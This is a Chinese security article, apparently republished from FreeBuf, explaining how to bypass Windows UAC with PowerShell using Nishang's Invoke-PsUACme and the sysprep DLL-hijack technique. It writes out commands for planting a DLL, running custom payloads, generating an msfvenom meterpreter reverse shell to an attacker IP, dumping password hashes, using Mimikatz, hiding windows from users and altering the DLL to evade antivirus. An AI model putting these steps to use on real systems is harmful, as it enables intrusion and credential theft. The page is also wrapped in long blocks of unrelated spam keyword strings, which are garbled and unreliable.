精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

利用PowerShell繞過用戶帳戶控制(UAC)

安全 網(wǎng)站安全
UAC(User Account Control,用戶帳戶控制)是微軟為提高系統(tǒng)安全而在Windows Vista中引入的新技術(shù),它要求用戶在執(zhí)行可能會(huì)影響計(jì)算機(jī)運(yùn)行的操作或執(zhí)行更改影響其他用戶的設(shè)置的操作之前,提供權(quán)限或管理員‌密碼。

背景介紹

UAC(User Account Control,用戶帳戶控制)是微軟為提高系統(tǒng)安全而在Windows Vista中引入的新技術(shù),它要求用戶在執(zhí)行可能會(huì)影響計(jì)算機(jī)運(yùn)行的操作或執(zhí)行更改影響其他用戶的設(shè)置的操作之前,提供權(quán)限或管理員‌密碼。通過在這些操作啟動(dòng)前對(duì)其進(jìn)行驗(yàn)證,UAC 可以幫助防止惡意軟件和間諜軟件在未經(jīng)許可的情況下在計(jì)算機(jī)上進(jìn)行安裝或?qū)τ?jì)算機(jī)進(jìn)行更改。

[[151645]]

最近,在同Red團(tuán)隊(duì)接觸的過程中,我通過客戶端側(cè)攻擊獲取到了一些用戶機(jī)器的訪問shell。在很多情況下,用戶都擁有管理權(quán)限,但是我卻陷入了非提權(quán)的PowerShell反向shell,此時(shí)UAC就是讓人掃興的地方。我討厭UAC,因?yàn)樗軣┤说€沒處在安全邊界。我曾閱讀資料以及嘗試?yán)@過UAC,從中我知道繞過它其實(shí)是微不足道的。在本文中,我們將嘗試各種方法和代碼來繞過UAC。

UACME及使用方法

我們選擇的用以繞過UAC的工具是UACME。這個(gè)優(yōu)秀的工具實(shí)現(xiàn)了各種方法,并且值得慶幸的是它是開源的,為此感謝@hFirF0XAs。因?yàn)槲铱偸潜M量在后期利用階段都使用PowerShell,所以我測(cè)試了UACME,并使用PowerShell實(shí)現(xiàn)了其中的一些方法。這里我給出Invoke-PsUACme.ps1文件,你可以在Nishang中的“Escalation(提權(quán))”分類中找到它。

首先,我們以sysprep方法開始,它是繞過UAC最常用的方法,它在2009年由Leo Davidson而出名(詳情)。它包括以下步驟:

1、復(fù)制并在目錄C:\Windows\System32\sysprep中植入一個(gè)DLL。DLL的名稱取決于Windows版本。

(1)Windows 7上為CRYPTBASE.dll。

(2)Windows 8上為shcore.dll。

2、從上述目錄中執(zhí)行sysprep.exe。它將加載上述DLL并以特殊權(quán)限執(zhí)行它。

事實(shí)上,所有的UAC繞過方法包括加載DLL和可執(zhí)行的名稱和位置。見下表:

利用PowerShell繞過用戶帳戶控制(UAC)

 

測(cè)試過的構(gòu)建版本:

Windows 7 build 6.1.7601.65536

Windows 8.1 build 6.3.9600.0

Windows 10 build 10.0.10240.0

現(xiàn)在,將DLL復(fù)制到 sysprep目錄,我們需要進(jìn)行權(quán)限提升。實(shí)現(xiàn)這一目的的兩種最流行的方式是:使用一個(gè)IFileOperation COM對(duì)象,或者使用Wusa.exe和它的“extract”選項(xiàng)。目前,Invoke-PsUACme使用的是Wusa方法。因?yàn)閃usa設(shè)置為了自動(dòng)提升,所以我們可以用它來提取一個(gè)cab文件到sysprep目錄。可以通過使用makecab工具創(chuàng)建一個(gè)cab文件:

C:\> makecab C:\uac\evil.dll C:\uac\uac.cab

上面的命令只是為了解釋Invoke-PsUACme到底做了什么,我們并不需要手動(dòng)運(yùn)行這些命令。

現(xiàn)在,Invoke-PsUACme使用的DLL來自于UACME項(xiàng)目,并做了一個(gè)小小的改變。并非運(yùn)行cmd.exe,而是我們告訴DLL從C:\Windows\Temp執(zhí)行cmd.bat。這個(gè)cmd.bat中包含了我們將在目標(biāo)機(jī)器上執(zhí)行的payload。在執(zhí)行復(fù)雜攻擊時(shí),這一點(diǎn)將給我們提供很大的靈活性。

利用PowerShell繞過用戶帳戶控制(UAC)

 

上面的DLL(64位和32位)被硬編碼在了DLLBytes64和DLLBytes32變量中的腳本中。這個(gè)腳本能夠確定進(jìn)程的bit-ness,而它就是從這里被調(diào)用的,并且使用apt DLL。說到更有趣的部分時(shí),Invoke-PsUACme可以這樣使用:

PS C:\> Invoke-PsUACme -method sysprep

利用PowerShell繞過用戶帳戶控制(UAC)

 

很好,我們能夠繞過UAC了。默認(rèn)的payload僅僅檢查繞過是否是成功的。注意,在cmd.bat文件中將-noexit參數(shù)傳遞給了PowerShell中,這樣我們就可以看到輸出了。

自定義Payload

我們還可以一直使用自定義payload:

PS C:\> Invoke-PsUACme -method oobe -Payload "powershell -noexit -c Get-Process"

請(qǐng)注意,我們還需要指定powershell.exe。無論為Paylaod參數(shù)指定了什么,它都會(huì)在C:\Windows\Temp\cmd.bat中結(jié)束。在DLL中改變批處理文件的路徑之后,你也可以使用PayloadPath參數(shù)改變它。

利用PowerShell繞過用戶帳戶控制(UAC)

 

后文中我們將再次講解Payload參數(shù)的更多實(shí)際應(yīng)用。

自定義DLL

為了使用一個(gè)自定義DLL,我們可以使用CustomDLL64和CustomDLL32參數(shù)。例如,可以使用UACME中原始的64位Fubuki DLL,并利用Invoke-PsUACme來使用它:

PS C:\> Invoke-PSUACMe -CustomDll64 C:\test\Fubuki64.dll -CustomDll32

利用PowerShell繞過用戶帳戶控制(UAC)

 

我們也可以向DLLBytes64和DLLBytes32參數(shù)提供一個(gè)DLL的字節(jié)數(shù)組。

使用方法

現(xiàn)在,讓我們?cè)佻F(xiàn)本文開頭中的場(chǎng)景,我們有幾個(gè)未提權(quán)的反向PowerShell shell,我們可以使用Invoke-PsUACme來以高權(quán)限執(zhí)行命令和腳本。接下來,我們使用Nishang的反向TCP(reverse TCP one liner),并使用Invoke-Encode編碼它,然后通過Invoke-PsUACme來使用它:

利用PowerShell繞過用戶帳戶控制(UAC)

 

很酷吧,我們成功地繞過了UAC,并提升了我們的權(quán)限。為了驗(yàn)證這一點(diǎn),我們從Powerpreter運(yùn)行Get-PassHashes。一旦成功進(jìn)行了權(quán)限提升,通過使用Nishang/Powerpreter的Enable-DuplicateToken,我們總是可以將權(quán)限提升為SYSTEM。

利用PowerShell繞過用戶帳戶控制(UAC)

 

事實(shí)上,在提升為SYSTEM權(quán)限后,我們也可以使用Powersploit中的Invoke-Mimikatz來用于域tokens。

在上面的例子中,如果你不能從web服務(wù)器上pull到腳本,那么可以使用Invoke-Encode將它們編碼為壓縮的base64類型,并能夠以powershell.exe中的編碼指令(-e或-encodecommand)參數(shù)使用。也許,你可能喜歡使用PowerShell中的“-WindowStyle hidden”參數(shù)來避免向用戶顯示任何彈窗。

雖然metasploit對(duì)于UAC繞過有它自己的實(shí)現(xiàn)方法,且我們可以利用提升的權(quán)限得到一個(gè)meterpreter,但利用前面的方法可以有無限的機(jī)會(huì)。此外,在PowerShell中,我們可以使用msfvenom來生成一個(gè)meterpreter:

./msfvenom -p windows/x64/meterpreter/reverse_https LHOST = 192.168.230.154 -f psh-reflection

我已經(jīng)多次強(qiáng)調(diào),對(duì)于Windows網(wǎng)絡(luò)的滲透測(cè)試來說PowerShell是多么的有用。例如,在最初進(jìn)行客戶端側(cè)攻擊時(shí),我們可以使用Invoke-PsUACme作為一個(gè)有效載荷(paylaod)。接下來,我們使用Nishang的Invoke-PsUACme和Out-Word。我們從Invoke-PsUACme腳本本身來進(jìn)行函數(shù)調(diào)用,以此避免不必要的復(fù)雜命令。

利用PowerShell繞過用戶帳戶控制(UAC)

 

搞定,此時(shí)就得到了一個(gè)提權(quán)的交互式反向PowerShell shell。

正如你所看到的,在PowerShell中實(shí)現(xiàn)現(xiàn)有技術(shù)是非常有益的,它不僅增加了對(duì)PowerShell的理解,還提高了使用PowerShell的技術(shù)。

限制性

因?yàn)镮nvoke-PsUACme基于UACME項(xiàng)目,而它所實(shí)現(xiàn)的技術(shù)會(huì)被惡意軟件所使用,因此有可能它所使用的DLL在以后會(huì)被殺毒軟件檢測(cè)到。當(dāng)這種問題出現(xiàn)時(shí),根據(jù)以往的記錄,對(duì)DLL的源碼進(jìn)行小小的修改應(yīng)該能夠解決這個(gè)問題。

此外,因?yàn)閃usa.exe在Windows 10上沒有“extract”選項(xiàng),所以目前Invoke-PsUACme在Windows 10上無法工作。因此,請(qǐng)自由實(shí)現(xiàn)IFileOperation或任何其他方法。

擴(kuò)展閱讀

對(duì)于PowerShell中的UAC繞過,還有其他的實(shí)現(xiàn)。可以查看這里。

為了更好地了解UAC繞過,可以查看下面的鏈接:

https://www.greyhathacker.net/?p=796

http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
相關(guān)推薦

2017-05-05 12:23:25

2015-10-30 14:11:47

2010-12-27 14:33:01

用戶帳戶控制

2017-03-23 12:23:27

sdclt磁盤備份UAC

2018-11-13 12:56:57

2017-09-07 15:39:27

2012-05-03 08:44:31

2017-09-12 14:46:54

2010-12-07 14:10:56

Windows 7用戶帳戶控制

2010-06-09 16:39:38

用戶帳戶網(wǎng)絡(luò)安全

2010-11-29 14:05:29

2010-01-20 09:11:56

2010-02-25 09:57:35

2009-06-24 08:51:55

2017-11-06 05:52:52

2010-03-22 09:17:15

Office 97Windows 7UAC

2009-03-24 09:13:41

Windows 7使用技巧微軟

2022-02-23 15:43:31

網(wǎng)絡(luò)釣魚攻擊MFA

2019-08-26 10:50:16

MySQL用戶帳戶數(shù)據(jù)庫

2023-10-05 06:13:12

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

中文字幕日韩有码| 一区二区三区在线视频观看| 日韩美女写真福利在线观看| 亚洲一级理论片| 国产一区二区视频在线看| 夜色激情一区二区| 日产精品一线二线三线芒果| 国产欧美综合视频| 亚洲在线日韩| 久久精品这里热有精品| 中文字幕5566| 国产精品一区二区美女视频免费看 | 亚洲国产精品影院| 日韩资源av在线| 欧美一区二区综合| 亚洲欧美日韩综合| 国产aaaaa毛片| 手机在线免费看av| 国产亚洲综合在线| 91九色露脸| 最新在线中文字幕| 在线亚洲观看| 久久99视频免费| 亚洲av毛片基地| 精品自拍偷拍| 日韩一区国产二区欧美三区| 九热视频在线观看| 日本黄色免费在线| 一级精品视频在线观看宜春院| 日韩高清av| 天堂网av2014| 国产99精品国产| 成人久久一区二区三区| 日韩欧美国产另类| 国产欧美日韩一级| 国模吧一区二区| 欧美成人黄色网| 日韩欧美高清在线播放| 亚洲欧美国产高清va在线播| 国产精品熟妇一区二区三区四区| 日韩毛片网站| 欧美日本在线视频| 三年中国国语在线播放免费| 亚洲精品福利电影| 偷拍日韩校园综合在线| 亚洲色欲久久久综合网东京热| 国产美女福利在线| 国产精品对白交换视频 | 国内精品久久久久影院优| 全网免费在线播放视频入口| 亚洲综合中文| 久久综合久久美利坚合众国| 免费成人深夜蜜桃视频| av中文一区| 尤物精品国产第一福利三区| 国产精品20p| jiujiure精品视频播放| 有码中文亚洲精品| 亚洲色图第四色| 日韩激情图片| 日韩视频免费在线观看| 欧美一区免费观看| 午夜精品视频| 久久久久久久久久久成人| 精品深夜av无码一区二区老年| 国产一区日韩欧美| 久久久久亚洲精品国产| 日韩在线观看第一页| 亚洲美女毛片| 欧美孕妇与黑人孕交| 999视频在线| 免费观看久久久4p| 亚洲精品欧美日韩专区| 亚洲黄色一级大片| 99久久精品一区二区| 久热这里只精品99re8久| 黄色毛片在线观看| 中文字幕一区二| 欧美日韩激情四射| 日本不卡免费高清视频在线| 91福利小视频| 色婷婷综合在线观看| 第四色在线一区二区| 亚洲人成网站999久久久综合| 99精品全国免费观看| 68国产成人综合久久精品| 欧美夫妻性生活xx| 亚洲婷婷综合网| 国内精品伊人久久久久av影院 | 国产精品偷伦视频免费观看了| 超碰地址久久| 亚洲小视频在线观看| 国产精品精品软件男同| 亚洲黄色影片| 国产欧美亚洲视频| 性生交大片免费看女人按摩| 久久先锋影音av鲁色资源| 亚洲一区尤物| 美女扒开腿让男人桶爽久久软| 欧美日韩一级二级| 大尺度在线观看| 日本一区二区在线看| 欧美国产日韩一区二区在线观看| 亚洲综合久久网| 国产精品自在在线| 麻豆视频成人| 欧美日韩在线视频免费观看| 在线免费观看日本欧美| 国产人妻精品午夜福利免费| 日韩精品一区二区久久| 国内外成人免费激情在线视频网站 | 在线国产一区| 国产成人精品在线观看| 狠狠躁夜夜躁av无码中文幕| 亚洲国产精品精华液2区45| 久久99久久久久久| 日韩一区中文| 国产一区二区黄| 久久久久久久久久免费视频| 国产麻豆午夜三级精品| 日韩欧美亚洲日产国| wwww亚洲| 日韩午夜中文字幕| 肉色超薄丝袜脚交69xx图片| 乱码第一页成人| 国产精品免费一区二区三区| 免费在线你懂的| 在线观看三级视频欧美| av在线网站观看| 亚洲精品欧洲| 国产精品久久亚洲7777| 成人av免费| 777精品伊人久久久久大香线蕉| 国产全是老熟女太爽了| 亚洲美女一区| 极品尤物一区二区三区| 男男gaygays亚洲| 91精品欧美久久久久久动漫| 青青青视频在线播放| 亚洲欧美视频| 免费成人深夜夜行视频| 欧美gv在线| 日韩av综合中文字幕| 精品深夜av无码一区二区老年| 国产久卡久卡久卡久卡视频精品| 黄色www在线观看| 久久精品资源| 日韩中文有码在线视频| 中文无码av一区二区三区| 国产色91在线| 黄色免费网址大全| 成人3d精品动漫精品一二三| 国产精品久久不能| 午夜在线播放| 88在线观看91蜜桃国自产| 激情高潮到大叫狂喷水| 激情图片小说一区| 特大黑人娇小亚洲女mp4| 香蕉免费一区二区三区在线观看| 九九九久久久久久| 蜜臀av免费在线观看| 午夜国产精品影院在线观看| 屁屁影院国产第一页| 国产精品亚洲欧美| 欧美一区激情视频在线观看| 欧美××××黑人××性爽 | 国产精品二区在线观看| heyzo高清国产精品| 亚洲精品乱码久久久久久金桔影视 | 在线毛片网站| 日韩一区二区三区视频| 日韩av无码中文字幕| 91麻豆精品一区二区三区| 国产精品99久久免费黑人人妻| 波多野结衣的一区二区三区| 成人www视频在线观看| 日韩伦理电影网站| 日韩成人在线网站| 中日精品一色哟哟| 亚洲小说欧美激情另类| 成人免费av片| 国精产品一区一区三区mba视频| 日韩久久久久久久久久久久| 色老板在线视频一区二区| 国产精品福利小视频| wwwav在线| 亚洲另类欧美自拍| 国产精品久久久久久久免费| 亚洲观看高清完整版在线观看 | 亚洲精品成人在线播放| 亚洲精华国产欧美| 色播亚洲婷婷| 日韩精品中文字幕一区二区| 18一19gay欧美视频网站| 三区四区在线视频| 亚洲精品720p| 国产精品高潮呻吟av| 五月婷婷久久综合| 亚洲AV成人无码精电影在线| 91首页免费视频| 亚洲国产综合av| 丝袜诱惑亚洲看片| 免费的一级黄色片| 成人国产精品一级毛片视频| 国产精品青青草| 人人精品久久| 国产成人在线一区二区| 欧美一卡二卡| 久久综合网hezyo| 韩国中文字幕2020精品| 精品国产乱码久久久久久1区2区| 日本三级一区二区三区| 午夜欧美视频在线观看| 国产日产精品一区二区三区的介绍| 久久综合九色综合97婷婷| wwwxxxx在线观看| 麻豆精品视频在线| 一女被多男玩喷潮视频| 欧美先锋影音| 天天成人综合网| 欧美日韩伦理| 欧美日韩精品综合| 精品少妇3p| 99精品国产高清一区二区| 黄色成人小视频| 国产成人一区二区在线| 性欧美xxx69hd高清| 欧美激情一区二区三区成人| 黄色网址免费在线观看| 在线日韩av观看| 黄色免费在线播放| 亚洲图片欧洲图片av| 欧美日韩在线中文字幕| 日韩电影中文字幕| 特黄视频在线观看| 日韩av在线网址| 天堂影院在线| 精品一区二区三区四区| 蜜桃视频久久一区免费观看入口| 日韩欧美成人一区二区| www.国产三级| 日韩欧美在线影院| www.超碰在线.com| 精品国产一区a| 亚洲精品久久久久久动漫器材一区| 3d动漫精品啪啪一区二区竹菊| 亚洲中文一区二区三区| 欧美日韩精品是欧美日韩精品| 中文字幕在线天堂| 色妹子一区二区| 欧美另类高清videos的特点| 欧美体内she精视频| 中文字幕在线观看1| 欧美乱妇15p| av网站在线免费看| 精品欧美乱码久久久久久 | 95精品视频在线| 一本色道综合久久欧美日韩精品| 91香蕉视频mp4| 91成人破解版| 国产精品亲子伦对白| 国精产品视频一二二区| 综合在线观看色| 久久黄色小视频| 欧美日韩激情视频| 久久久久久无码精品大片| 欧美日精品一区视频| 国产乱淫a∨片免费观看| 日韩视频一区二区在线观看| 欧美视频一二区| 亚洲精品小视频在线观看| а天堂8中文最新版在线官网| 色婷婷综合成人| 色呦呦在线播放| 欧美一级片久久久久久久| 欧美日韩在线精品一区二区三区激情综合| 国产精品视频在线观看| 日韩一区二区三区精品视频第3页| 国产精品一区二区免费看| 香蕉人人精品| 一本色道婷婷久久欧美| 一区免费在线| 日日摸天天爽天天爽视频| 精久久久久久久久久久| 看全色黄大色黄女片18| 国产日韩精品一区二区三区| 看片网站在线观看| 欧美视频一区二区三区…| 伊人精品在线视频| 欧美精品一区视频| www.国产精品.com| 欧美极品在线播放| jizzjizz少妇亚洲水多| 99国产超薄丝袜足j在线观看| 青青草原在线亚洲| 免费观看中文字幕| 久久国产精品毛片| 香蕉网在线视频| 中文字幕不卡在线| 日本三级免费看| 欧美日韩国产欧美日美国产精品| 欧洲成人一区二区三区| 日韩在线视频免费观看高清中文| 国模私拍一区二区国模曼安| 91久久在线视频| 国产一卡不卡| www国产精品内射老熟女| 精品综合久久久久久8888| 法国伦理少妇愉情| 亚洲五月六月丁香激情| 国产精品视频在线观看免费 | 国产成人精品福利一区二区三区| 国语产色综合| 1024av视频| 高清成人免费视频| 成年人午夜剧场| 欧美日韩亚洲综合| 黄视频在线播放| 97在线看免费观看视频在线观看| 精品一区二区三区中文字幕| 日韩国产伦理| 免费日韩av片| 插我舔内射18免费视频| 亚洲自拍另类综合| 国产一区二区三区视频免费观看 | 国产精品成人一区二区三区 | 欧美黑人性猛交| 二区三区精品| 五月天av影院| 九一久久久久久| 色偷偷www8888| 欧美日韩午夜在线视频| 精品视频一二三| 国产成人精品免费视频| 亚洲v天堂v手机在线| 久久久久久久久久网| 成人精品电影在线观看| 麻豆视频在线观看| 日韩欧美国产一区二区在线播放 | 亚洲一级片免费观看| 国产精品护士白丝一区av| 中文字幕av网站| 在线免费看av不卡| 国产亚洲欧美日韩精品一区二区三区 | 国产精品av久久久久久麻豆网| 91香蕉国产线在线观看| 亚洲精品中文在线影院| www.欧美国产| 欧美激情伊人电影| 超碰精品在线观看| 国产不卡一区二区视频| 成人av影院在线| 女人十八岁毛片| 亚洲欧美日韩在线高清直播| 神马久久资源| 亚洲欧美日韩国产成人综合一二三区| 青青草国产成人99久久| 青青青手机在线视频| 欧美丰满一区二区免费视频| 成人黄色网址| 精品不卡在线| 日日夜夜精品视频免费| 青青青视频在线播放| 欧美一级一区二区| rebdb初裸写真在线观看| 精品欧美国产一区二区三区不卡| 久久激情网站| 国产在视频线精品视频| 欧美一区二区在线看| 菠萝蜜视频在线观看www入口| 久久99蜜桃综合影院免费观看| 美女精品一区| 国产探花在线视频| 亚洲第一中文字幕在线观看| 国产欧美一区二区三区精品酒店| 亚洲国产高清国产精品| 国产成人在线影院| 视频一区二区三区四区五区| 自拍亚洲一区欧美另类| 中文字幕视频精品一区二区三区| 欧美 国产 综合| 国产精品沙发午睡系列990531| 亚洲AV无码乱码国产精品牛牛| 91chinesevideo永久地址| 欧美伦理在线视频| 自拍偷拍激情视频| 色婷婷国产精品| av片哪里在线观看| 激情视频一区二区| 精品一区二区三区影院在线午夜| 久久99久久久| 中文字幕亚洲一区在线观看 | 综合久久国产| 91污在线观看| 国产黄色av网站| 国产97在线|亚洲| 亚洲一级影院| 免费成人深夜蜜桃视频| 日韩高清不卡av| 精品一区二区三区中文字幕 |